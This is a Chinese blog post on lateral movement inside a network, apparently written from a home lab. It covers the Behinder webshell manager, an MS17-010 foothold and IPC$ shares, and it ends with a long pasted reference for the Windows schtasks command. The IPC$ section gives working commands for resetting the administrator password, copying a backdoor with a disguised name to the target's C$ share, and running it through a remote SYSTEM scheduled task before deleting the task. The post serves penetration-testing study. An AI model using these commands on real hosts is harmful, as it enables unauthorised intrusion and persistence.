内网安全之横向移动(冰蝎&&msf&&IPC$)

1.冰蝎介绍

冰蝎是一款目前比较流行的Webshell管理工具，在2021年更新的2021.4.20 v3.0 Beta 9 版本中去除了动态密钥协商机制，采用预共享密钥，载荷全程无明文。因其优秀的加密传输特性，被攻击者广泛采用。冰蝎相较其它Webshell管理工具，具备如下优点：支持跨平台运行、多采用加密传输、版本更新频繁等。目前冰蝎已更新到2021.4.20 v3.0 Beta 9 ，新版本增加了Java内存马注入、支持多种Web容器、反向DMZ等功能。

2.实验

通过获取内网中的主机shell，上传木马，再通过内网主机之间建立IPC$通道实现内网横向移动，并通过windows定时任务执行，获取反弹shell

环境：

kali: 192.168.4.157

win7A:192.168.4.129 1.1.1.10

win7B:1.1.1.11

首先通过ms17-010获取内网win7A的shell

通过获得的shell，与WIN7B建立IPC$通道，

生成远程木马

上传木马到WIN7A

进入win7A的shell通过ipc$通道上传木马至win7B

设置payload进行本地监听此木马，等待反向连接，通过schtasks命令来执行木马

由于环境出了问题，因为上传的.exe因系统权限，没能成功执行，后期可以上传一些ps,或者其他shell，来获取目标系统的shell，整个人麻木了，这是啥呀。。。。。。。

知识补充：

1.IPC$简介

IPC$(Internet Process Connection)是共享"命名管道"的资源，它是为了让进程间通信而开放的命名管道，通过提供可信任的用户名和口令，连接双方可以建立安全的通道并以此通道进行加密数据的交换，从而实现对远程计算机的访问。

使用条件

1.开放了139、445端口；

2.目标开启ipc$文件共享；

3.获取用户账号密码。

测试过程

此测试前提是获取了ipc$，

这里测试的时候得到的权限是system，然后创建了一个admin账户，给了administrators权限，但无法复制文件过去，于是就改了administrator账户密码（实战中不建议更改，可读取管理密码后再用读到的密码）。

更改密码：net user administrator "1qaz@WSX"

1.连接目标ipc$，将后门复制到目标机器上

net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"

copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe

2.创建自动任务，执行上传的后门程序

# 查看目标机器时间

net time \\193.168.1.12

# 创建该时间之后的某个时刻自动执行任务，任务名 plugin_update

schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"

# 如果不想等，可以立即运行后门程序

schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

# 删除创建的任务

schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

接收端的目标机器已上线。

常用命令

# 1.连接

net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"

# 2.查看连接情况

net use

# 3.查看目标主机共享资源

net view \\193.168.1.12

# 4.查看目标主机时间

net time \\193.168.1.12

# 5.查看目标主机的NetBIOS用户（自己本机也需开启）

nbtstat -A 193.168.1.12

# 6.删除连接

net use \\193.168.1.12\ipc$ /del

# 7.文件上传下载

copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe

（上传到目标的:c\windows\temp\目录下）

copy \\127.0.0.1\c$\test.exe c:\

（下载到本地c盘下）

# 8.创建计划任务

schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"

# 9.立即执行计划任务

schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

# 10.删除计划任务

schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"

2.schtasks简介

schtasks create 创建新的计划任务。

语法

schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month...] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]] /?

参数

/tn TaskName 指定任务的名称。

/tr TaskRun 指定任务运行的程序或命令。键入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名。

如果忽略该路径，SchTasks.exe 将假定文件在 Systemroot\System32 目录下。

/sc schedule 指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。

值说明

MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY
指定计划的时间单位。

ONCE
任务在指定的日期和时间运行一次。

ONSTART
任务在每次系统启动的时候运行。可以指定启动的日期，或下一次系统启动的时候运行任务。

ONLOGON
每当用户（任意用户）登录的时候，任务就运行。可以指定日期，或在下次用户登录的时候运行任务。

ONIDLE
只要系统空闲了指定的时间，任务就运行。可以指定日期，或在下次系统空闲的时候运行任务。

/mo modifier

指定任务在其计划类型内的运行频率。这个参数对于 MONTHLY 计划是必需的。对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划，这个参数有效，但也可选。默认值为 1。

计划类型
修饰符
说明

MINUTE
1 ～ 1439
任务每 n 分钟运行一次。

HOURLY
1 ～ 23
任务每 n 小时运行一次。

DAILY
1 ～ 365
任务每 n 天运行一次。

WEEKLY
1 ～ 52
任务每 n 周运行一次。

MONTHLY
1 ～ 12
任务每 n 月运行一次。

LASTDAY
任务在月份的最后一天运行。

FIRST、SECOND、THIRD、FOURTH、LAST
与 /d day 参数共同使用,并在特定的周和天运行任务。例如，在月份的第三个周三。

/d dirlist

指定周或月的一天。只与 WEEKLY 或 MONTHLY 计划共同使用时有效。

计划类型
日期值

WEEKLY
可选项。有效值是 MON ~ SUN 和 * （每一天）。MON 是默认值。

MONTHLY
在使用 FIRST、SECOND、THIRD、FOURTH 或 LAST 修饰符 (/mo) 时，需要 MON ～ SUN 中的某个值。1 ～ 31 是可选的，只在没有修饰符或修饰符为 1 ～ 12 类型时有效。默认值是 1 （月份的第一天）。

/m month[,month...]

指定一年中的一个月。有效值是 JAN ～ DEC 和 * （每个月）。/m 参数只对于 MONTHLY 计划有效。在使用 LASTDAY 修饰符时，这个参数是必需的。否则，它是可选的，默认值是 * （每个月）。

/i InitialPageFileSize

指定任务启动之前计算机空闲多少分钟。键入一个 1 ～ 999 之间的整数。这个参数只对于 ONIDLE 计划有效，而且是必需的。

/st StartTime

以 HH:MM:SS 24 小时格式指定时间。默认值是命令完成时的当前本地时间。/st 参数只对于 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY 和 ONCE 计划有效。它只对于 ONCE 计划是必需的。

/sd StartDate

以 MM/DD/YYYY 格式指定任务启动的日期。默认值是当前日期。/sd 参数对于所有的计划有效，但只对于 ONCE 计划是必需的。

/ed EndDate

指定任务计划运行的最后日期。此参数是可选的。它对于 ONCE、ONSTART、ONLOGON 或 ONIDLE 计划无效。默认情况下，计划没有结束日期。

/s Computer

指定远程计算机的名称或 IP 地址（带有或者没有反斜杠）。默认值是本地计算机。

/u [domain\]user

使用特定用户帐户的权限运行命令。默认情况下，使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。

/p password

指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数，则需要该参数。

/ru {[Domain\]User | "System"}

使用指定用户帐户的权限运行任务。默认情况下，使用用户登录到运行 SchTasks 的计算机上的权限运行任务。

值
说明

[domain\}User?
指定用户帐户。

"System" 或 ""
指定操作系统使用的 NT Authority\System 帐户。

/p Password

指定用户帐户的密码，该用户帐户在 /u 参数中指定。如果在指定用户帐户的时候忽略了这个参数，SchTasks.exe 会提示您输入密码而且不显示键入的文本。使用 NT Authority\System 帐户权限运行的任务不需要密码，SchTasks.exe 也不会提示索要密码。

/?

在命令提示符显示帮助。

注释

SchTasks.exe 不验证程序文件的位置或用户帐户密码。如果没有为用户帐户输入正确的文件位置或正确的密码，任务仍然可以创建，但不会运行。另外，如果帐户的密码更改或过期，而且没有更改存储在任务中的密码，那么任务也不会运行。
NT Authority\System 帐户没有交互式登录权限。用户看不到以系统权限运行的程序，不能与之交互。
每个任务只运行一个程序。但是，可以创建一个批处理文件来启动多个任务，然后计划一个任务来运行该批处理文件。
只要创建了任务就可对其测试。使用 run 操作来测试任务，然后从 SchedLgU.txt 文件 ( Systemroot\SchedLgU.txt ) 中查阅错误。

每个计划类型的语法和范例。

若要查看该命令语法，请单击以下命令：

schtasks create minute

语法

schtasks /create /tn TaskName /tr TaskRun /sc minute [/mo {1 - 1439}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]

范例

计划任务每 20 分钟运行一次。

下面的命令计划安全脚本 Sec.vbs 每 20 分钟运行一次。由于命令没有包含起始日期或时间，任务在命令完成 20 分钟后启动，此后每当系统运行它就每 20 分钟运行一次。请注意，安全脚本源文件位于远程计算机上，但任务在本地计算机上计划并执行。

schtasks /create /sc minute /mo 20 /tn "Security Script" /tr \\central\data\scripts\sec.vbs

作为响应，SchTasks.exe 显示一条消息来说明任务会以当前用户的权限运行并需要当前用户的密码。输入密码时，SchTasks.exe 不显示键入的文本。

 The task will be created under current logged-in user name. Please enter the password ************

然后 SchTasks.exe 显示一条消息表明已计划该任务：

成功：计划任务 "Security Script" 已成功创建。

查询显示命令计划的任务：

 TaskName Next Run Time Status ========================= ======================== ============== Security Script 10:50:00 AM , 4/4/2001

schtasks create hourly

语法

schtasks /create /tn TaskName /tr TaskRun /sc hourly [/mo {1 - 365}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]

范例

计划命令在每小时过五分的时候运行。

下面的命令将计划 MyApp 程序从午夜过后五分钟起每小时运行一次。因为忽略了 /mo 参数，命令使用了小时计划的默认值，即每 (1) 小时。如果该命令在 12:05 A.M 之后生成，程序将在第二天才会运行。

schtasks /create /sc hourly /st 00:05:00 /tn "My App" /tr c:\apps\myapp.exe

计划命令每五小时运行一次

下面的命令计划 MyApp 程序从 2001 年 3 月的第一天起每五小时运行一次。它使用 /mo 参数来指定间隔时间，使用 /sd 参数来指定起始日期。由于命令没有指定起始时间，当前时间被用作起始时间。

schtasks /create /sc hourly /mo 5 /sd 03/01/2001 /tn "My App" /tr c:\apps\myapp.exe

schtasks create daily

语法

schtasks /create /tn TaskName /tr TaskRun /sc daily [/mo {1 - 365}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]

范例

计划任务每天运行一次

下面的范例计划 MyApp 程序在每天的 8:00 A.M. 运行一次，直到 2001 年 12 月 31 日结束。由于它忽略了 /mo 参数，所以使用默认间隔 1 来每天运行命令。

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc daily /st 08:00:00 /ed 12/31/2001

计划任务每隔一天运行一次

下面的范例计划 MyApp 程序从 2001 年 12 月 31 日起每隔一天在 1:00 P.M. (13:00) 运行。命令使用 /mo 参数来指定两 (2) 天的间隔。

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc daily /mo 2 /st 13:00:00 /sd 12/31/2001

schtasks create weekly

语法

schtasks /create /tn TaskName /tr TaskRun /sc weekly [/d {MON - SUN | *}] [/mo {1 - 52}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]

范例

计划任务每六周运行一次

下面的命令计划 MyApp 程序在远程计算机上每六周运行一次。该命令使用 /mo 参数来指定间隔。它也使用 /s 参数来指定远程计算机，使用 /ru 参数来计划任务以用户的 Administrator 帐户权限运行。因为忽略了 /rp 参数，SchTasks.exe 会提示用户输入 Administrator 帐户密码。

另外，因为命令是远程运行的，所以命令中所有的路径，包括到 MyApp.exe 的路径，都是指向远程计算机上的路径。

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc weekly /mo 6 /s Server16 /ru Admin01

计划任务每隔一周在周五运行

下面的命令计划任务每隔一周在周五运行。它使用 /mo 参数来指定两周的间隔，使用 /d 参数来指定是一周内的哪一天。如计划任务在每个周五运行，要忽略 /mo 参数或将其设置为 1。

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc weekly /mo 2 /d FRI

schtasks create monthly

语法

常规月计划语法: schtasks /create /tn TaskName /tr TaskRun /sc monthly [/mo {FIRST | SECOND | THIRD | FOURTH | LAST | LASTDAY] [/d {MON - SUN | 1 - 31}] [/m {JAN - DEC[,JAN - DEC...] | *}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]
指定周的语法: schtasks /create /tn TaskName /tr TaskRun /sc monthly /mo {FIRST | SECOND | THIRD | FOURTH | LAST} /d {MON - SUN} [/m {JAN - DEC[,JAN - DEC...] | *}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]
Lastday 语法: schtasks /create /tn TaskName /tr TaskRun /sc monthly /mo LASTDAY /m {JAN - DEC[,JAN - DEC...] | *} [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]
指定日期的语法: schtasks /create /tn TaskName /tr TaskRun /sc monthly /d {1 - 31} [/m {JAN - DEC[,JAN - DEC...] | *}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [domain\]user /p password]] [/ru {[Domain\]User | "System"} [/rp Password]]

范例

计划任务在每月的第一天运行

下面的命令计划 MyApp 程序在每月的第一天运行。因为默认修饰符是 none（即：没有修饰符），默认天是第一天，默认的月份是每个月，所以该命令不需要任何其它的参数。

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly

计划任务在每月的最后一天运行

下面的命令计划 MyApp 程序在每月的最后一天运行。它使用 /mo 参数指定在每月的最后一天运行程序，使用通配符 (*) 与 /m 参数表明在每月的最后一天运行程序。

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly /mo lastday /m *

计划任务每三个月运行一次

schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc onidle /i 10

语法

schtasks /change /tn TaskName [/s computer [/u [domain\]user /p password]] [/tr TaskRun] [/ru [Domain\]User | "System"] [/rp Password]

参数

/tn TaskName

标识要更改的任务。输入任务名。

/s Computer

指定远程计算机的名称或 IP 地址（带有或者没有反斜杠）。默认值是本地计算机。

/u [domain\]user

使用特定用户帐户的权限运行命令。默认情况下，使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。

/p password

指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数，则需要该参数。

/tr TaskRun

更改任务运行的程序。输入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名。如果忽略了路径，SchTasks.exe 假定文件在 Systemroot\System32 目录下指定的程序替换任务最初运行的程序。

/ru [Domain\]User | "System"

更改用于任务的用户帐户。

值
说明

[domain\]User
指定用户帐户

"System" or ""
指定为操作系统所使用的 NT Authority\System 帐户。

在更改用户帐户的时候，必须也要更改用户密码。如果命令带有 /ru 参数，但没有 /rp 参数，SchTasks.exe 提示要求输入新的密码而且不显示键入的文本。

任务以不需要密码的 NT Authority\System 帐户权限运行，SchTasks.exe 不会提示输入密码。

/p Password

更改用于任务的帐户密码。输入新的密码。

/?

在命令提示符显示帮助。

注释

/tn 和 /s 参数标识该任务。/tr、/ru 和 /rp 参数指定可以更改的任务属性。
使用 change 操作的命令必须至少更改一个任务属性。
NT Authority\System 帐户没有交互式登录权限。用户看不到以系统权限运行的程序，不能与其交互。

范例

更改任务运行的程序

下面的命令将 Virus Check 任务运行的程序由 VirusCheck.exe 更改为 VirusCheck2.exe。此命令使用 /tn 参数标识任务，使用 /tr 参数指定任务的新程序。（不能更改任务名称。）

schtasks /change /tn "Virus Check" /tr C:\VirusCheck2.exe

作为响应，SchTasks.exe 显示以下成功消息：

成功：计划任务 "Virus Check" 的参数已更改。

此命令的结果是，Virus Check 任务现运行 VirusCheck2.exe。

更改远程任务的用户密码

下面的命令更改用于远程计算机 Svr01 上 RemindMe 任务的用户帐户密码。命令使用 /tn 参数标识任务，使用 /s 参数指定远程计算机。它使用 /rp 参数指定新的密码 p@ssWord3。

在用户帐户密码过期或更改的时候需要此过程。如果存储在任务中的密码无效，那么任务不会运行。

schtasks /change /tn RemindMe /s Svr01 /rp p@ssWord3

作为响应，SchTasks.exe 显示以下成功消息：

成功：计划任务 "RemindMe" 的参数已更改。

这个命令的结果是，RemindMe 任务现在以其初始的用户帐户运行，但拥有一个新密码。

更改任务的程序和用户帐户

下面的命令更改任务运行的程序以及任务运行的用户帐户。实质上，它将旧的计划用于新的任务。这个命令将每天早上 9:00 a.m. 启动 "Notepad.exe" 的 Notepad 任务更改为启动 "Internet Explorer"。

该命令使用 /tn 参数来标识任务。它使用 /tr 参数更改任务运行的程序，使用 /ru 参数更改任务运行凭据的用户帐户。

忽略为用户帐户提供密码的 /rp 参数。必须为帐户提供密码，但可以使用 /rp 参数以及在明文中键入密码，或等待 SchTasks.exe 要求输入密码的提示，然后以不显示文本的方式输入密码。

schtasks /change /tn Notepad /tr "c:\program files\Internet Explorer\iexplore.exe" /ru DomainX\Admin01

作为响应，SchTasks.exe 索要用于用户帐户的密码。它不显示键入的文本，因此密码不可见。

Please enter the password for DomainX\Admin01: *********

请注意，/tn 参数标识任务，/tr 和 /ru 参数更改任务的属性。不能使用另外一个参数来标识任务，而且不能更改任务的名称。

作为响应，SchTasks.exe 显示以下成功消息：

成功：计划任务 "Notepad" 的参数已更改。

这个命令的结果是：RemindMe 任务现在以其初始的用户帐户运行，但拥有一个新密码。

将程序更改为 System 帐户

下面的命令更改了 SecurityScript 任务以使其以 NT Authority\System 帐户权限运行。它使用 /ru "" 参数来表示 System 帐户。

schtasks /change /tn SecurityScript /ru ""

作为响应，SchTasks.exe 显示以下成功消息：

成功：计划任务 "SecurityScript" 的参数已更改。

因为任务以 System 帐户权限运行不需要密码，所以 SchTasks.exe 不提示输入密码。

schtasks run

立即运行计划任务。run 操作忽略计划，但使用程序文件位置、用户帐户和存储在任务中的密码立即运行任务。

语法

schtasks /run /tn TaskName [/s computer [/u [domain\]user /p password]] /?

参数

/tn TaskName: 标识任务。该参数是必需的。
/s Computer: 指定远程计算机的名称或 IP 地址（带有或者没有反斜杠）。默认值是本地计算机。
/u [domain\]user: 使用特定用户帐户的权限运行命令。默认情况下，使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password: 指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数，则需要该参数。
/?: 在命令提示符显示帮助。

注释

使用这个操作来测试任务。如果任务没有运行，请检查“任务计划程序服务”事务日志 Systemroot\SchedLgU.txt 以获取错误。
运行任务不会影响任务计划，不会更改为任务计划好的下次运行时间。
要远程运行任务，必须在远程计算机上计划任务。在运行该任务时，它仅在远程计算机上运行。要验证任务正在远程计算机上运行，请使用“任务管理器”或“任务计划程序”事务日志 Systemroot\SchedLgU.txt。

范例

在本地计算机上运行任务

下面的命令启动 "Security Script" 任务。

schtasks /run /tn "Security Script"

作为响应，SchTasks.exe 启动与任务相关联的脚本并显示以下消息：

成功：计划任务 "Security Script" 正在运行 ...

在远程计算机上运行任务

下面的命令在远程计算机 Svr01 上运行 Update 任务：

schtasks /run /tn Update /s Svr01

此时，SchTasks.exe 显示以下错误消息：

错误:无法运行计划任务 "Update"。

查看 Svr01 上的 “计划任务程序”事务日志 C:\Windows\SchedLgU.txt 以获取错误的原因。在这种情况下，日志中显示以下条目：

 "Update.job" (update.exe) 3/26/2001 1:15:46 PM ** ERROR ** The attempt to log on to the account associated with the task failed, therefore, the task did not run. The specific error is 0x8007052e:Logon failure:unknown user name or bad password. Verify that the task's Run-as name and password are valid and try again.

显然，任务中的用户名或密码在此系统中无效。下面的 schtasks /change 命令为 Svr01 上的 Update 任务更新用户名和密码：

schtasks /change /tn Update /s Svr01 /ru Administrator /rp PassW@rd3

在 change 命令完成之后，重新运行 run 命令。这一次，Update.exe 程序启动，SchTasks.exe 显示以下消息：

错误：无法运行计划任务 "Update"。

schtasks end

终止由任务启动的程序

语法

schtasks /end /tn TaskName [/s computer [/u [domain\]user /p password]] /?

参数

/tn TaskName: 标识启动程序的任务。该参数是必需的。
/s Computer: 指定远程计算机（带有或者没有反斜杠）的名称或 IP 地址。默认值是本地计算机。
/u [domain\]user: 使用特定用户帐户的权限运行命令。默认情况下，使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password: 指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数，则需要该参数。
/?: 显示帮助。

注释

SchTasks.exe 只终止由计划任务启动的程序实例。要终止其它程序，请使用 TaskKill。它是一个包含在 Windows XP Professional 中的工具。有关 TaskKill 的详细信息，请参阅 TaskKill。

范例

终止本地计算机上的任务

下面的命令终止由 My Notepad 任务启动的 Notepad 实例：

schtasks /end /tn "My Notepad"

作为响应，SchTasks.exe 终止了由任务启动的 Notepad 实例并显示以下成功消息：

 成功：计划任务 "My Notepad" 已成功终止。

终止远程计算机上的任务

下面的命令终止远程计算机 Svr01 上由 InternetOn 任务启动的 Internet Explorer 实例：

schtasks /end /tn InternetOn /s Svr01

作为响应，SchTasks.exe 停止由任务启动的 Internet Explorer 实例并显示以下成功消息：

成功：计划任务 "Update" 正在运行...

schtasks delete

删除计划任务

语法

schtasks /delete /tn {TaskName | *} [/f] [/s computer [/u [domain\]user /p password]] [/?]

参数

/tn {TaskName | *}

标识要删除的任务。该参数是必需的。

值
说明

TaskName
删除已命名任务。

*
删除计算机上的所有计划任务。

/f

阻止确认消息。不警告就删除任务。

/s Computer

指定远程计算机的名称或 IP 地址（带有或者没有反斜杠）。默认值是本地计算机。

/u [domain\]user

使用特定用户帐户的权限运行命令。默认情况下，使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。

/p password

指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数，则需要该参数。

/?

在命令提示符显示帮助。

注释

delete 操作从计划表中删除任务。它不删除任务运行的程序或中断正在运行的程序。
delete * 命令删除所有为计算机计划的任务，而不是仅删除由当前用户计划的任务。

范例

从远程计算机上的计划表中删除任务

下面的命令从远程计算机上的计划表中删除 "Start Mail" 任务。它使用 /s 参数来标识远程计算机。

schtasks /delete /tn "Start Mail" /s Svr16

作为响应， SchTasks.exe 显示以下确认消息。要删除任务，请键入 y。要取消命令，请键入 n：

警告您确定要删除任务 "Start Mail" 吗 (Y/N )? y 成功:已成功删除计划任务 "Start Mail"。

删除所有为本地计算机计划的任务。

下面的命令从本地计算机的计划表中删除所有的任务，包括由其它用户计划的任务。它使用 /tn * 参数代表计算机上所有的任务，使用/f 参数取消确认消息。

schtasks /delete /tn * /f

作为响应，SchTasks.exe 显示以下成功消息以表明只删除了计划任务 SecureScript。

成功：计划任务 "SecureScript" 已成功删除。

schtasks query

显示计划在计算机上运行的所有任务，包括那些由其它用户计划的任务。

语法

schtasks [/query] [/fo {TABLE | LIST | CSV}] [/nh] [/v] [/s computer [/u [domain\]user /p password]]

参数

[/query]

操作名称可选。键入不带任何参数的 schtasks 来执行查询。

/fo {TABLE|LIST|CSV}

指定输出格式。TABLE 为默认值。

/nh

忽略表格显示中的列标题。此参数与 TABLE 和 CSV 输出格式共同使用时有效。

/v

将任务的高级属性添加到显示中。

使用 /v 的查询应该格式化成 LIST 或 CSV。

/s Computer

指定远程计算机的名称或 IP 地址（带有或者没有反斜杠）。默认值是本地计算机。

/u [domain\]user

使用特定用户帐户的权限运行命令。默认情况下，使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。

/p password

指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数，则需要该参数。

/?

在命令提示符显示帮助。

注释

query 操作列出了为计算机计划的所有任务，而不只是由当前用户计划的任务。

范例

显示本地计算机上的计划任务。

下面的命令显示为本地计算机计划的所有任务。这些命令得到的结果相同，并可以交换使用。

schtasks

schtasks /query

作为响应，SchTasks.exe 以默认的简单表格格式显示任务，如下表所示：

 TaskName Next Run Time Status ========================= ======================== ============== Microsoft Outlook At logon time SecureScript 14:42:00 PM ， 2/4/2001

显示计划任务的高级属性

下面的命令要求详细的显示本地计算机上的任务。它使用 /v 参数来请求详细显示，使用 /fo LIST 参数来将显示格式化成易于阅读的列表。这个命令可以用来验证创建的任务有预期的循环模式。

schtasks /query /fo LIST /v

作为响应，SchTasks.exe 显示所有任务的详细属性列表。下面的显示给出了一个计划在每月最后一个周五的 4:00 A.M. 运行的任务的列表：

 HostName：RESKIT01 TaskName:SecureScript Next Run Time：4:00:00 AM ， 3/30/2001 Status:Not yet run Last Run Time：Never Last Result： 0 Creator：user01 Schedule：At 4:00 AM on the last Fri of every month, starting 3/24/2001 Task To Run:： C:\WINDOWS\system32\notepad.exe Start In:notepad.exe Comment:N/A Scheduled Task State:Enabled Scheduled Type：Monthly Modifier：Last FRIDAY Start Time4:00:00 AM Start Date: 3/24/2001 End Date：N/A Days:FRIDAY Months:JAN、FEB、MAR、APR、MAY、JUN、JUL、AUG、SEP、OCT、NOV、DEC Run As User:RESKIT\user01 Delete Task If Not Rescheduled:Enabled Stop Task If Runs X Hours and X Mins: 72:0 Repeat:Until Time：Disabled Repeat:Repeat:Disabled Repeat:Stop If Still Running: Disabled Idle: Start Time(For IDLE Scheduled Type): Disabled Idle: Only Start If Idle for X Minutes: Disabled Idle:If Not Idle Retry For X Minutes: Disabled Idle: Stop Task If Idle State End: Disabled Power Mgmt: No Start On Batteries: Disabled Power Mgmt:Stop On Battery Mode: Disabled

将为远程计算机计划的任务记入日志

下面的命令请求为远程计算机计划的任务列表，并将任务添加到本地计算机中以逗号分隔的日志文件中。此命令的格式可以用来收集和跟踪为多个计算机计划的任务。

命令使用 /s 参数标识远程计算机 Reskit16，使用 /fo 参数指定格式，使用 /nh 参数取消列标题。>> 附加符号将输出重定向到本地计算机 Svr01 上的任务日志 p0102.csv。因为命令在远程计算机上运行，所以本地计算机路径必须是完全合格的。

schtasks /query /s Reskit16 /fo csv /nh >> \\svr01\data\tasklogs\p0102.csv

作为响应，SchTasks.exe 会把为计算机 Reskit16 计划的任务添加到本地计算机 Svr01 上的 p0102.csv 文件中。

注释

SchTasks.exe 执行的操作类似于“控制面板”中“计划任务”中的操作。可以使用两种工具中的任一种来创建、删除、配置或显示计划任务。
键入不带任何参数的 schtasks 执行查询。
用户必须是命令起作用的计算机上的 Administrators 组的成员。
要确认计划运行或要找出计划不运行的原因，请查看“任务计划”服务事务日志 Systemroot\SchedLgU.txt。该日志记录了由包括“计划任务”和 SchTasks.exe 在内的所有使用该服务的工具启动的尝试运行。
损坏任务文件的情况极少发生。已损坏文件不会运行。在已损坏任务上试图执行某项操作时，SchTasks.exe 显示以下错误消息：
```
错误：数据非法。
```
已损坏任务无法恢复。要恢复系统的计划任务特征，请使用 SchTasks.exe 或“计划任务”从系统中删除任务并重新计划。
SchTasks.exe 取代了包含在 Windows 早期版本中的工具 At.exe。

feiyue3008